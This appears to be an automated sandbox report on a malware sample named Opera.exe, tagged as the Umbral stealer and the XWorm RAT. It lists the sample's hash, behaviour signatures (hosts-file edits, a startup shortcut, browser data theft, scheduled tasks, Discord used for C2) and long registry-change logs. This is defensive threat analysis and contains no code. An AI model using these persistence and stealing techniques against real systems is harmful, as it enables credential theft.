Malware Analysis Report

2024-10-10 10:08

Sample ID 240426-qhm44scd74
Target Opera.exe
SHA256 d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18
Tags
umbral xworm rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

Threat Level: Known bad

The file Opera.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm rat spyware stealer trojan

Umbral family

Xworm

Umbral

Xworm family

Detect Xworm Payload

Detect Umbral payload

Drops file in Drivers directory

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Views/modifies file attributes

NTFS ADS

Uses Task Scheduler COM API

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Suspicious behavior: GetForegroundWindowSpam

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-26 13:15

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 13:15

Reported

2024-04-26 13:26

Platform

win10-20240404-en

Max time kernel

599s

Max time network

602s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Opera.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral3.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral3.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b8b6a935dd97da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b9234432dd97da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000077be5bc85fff0f41b198e57ac8b8fd556f949a8d834d04243c3e36a10818c33f9f86645be44698351fe2e4a6d231d32847088fcadd3e9ee4169c C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 69055f34dd97da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
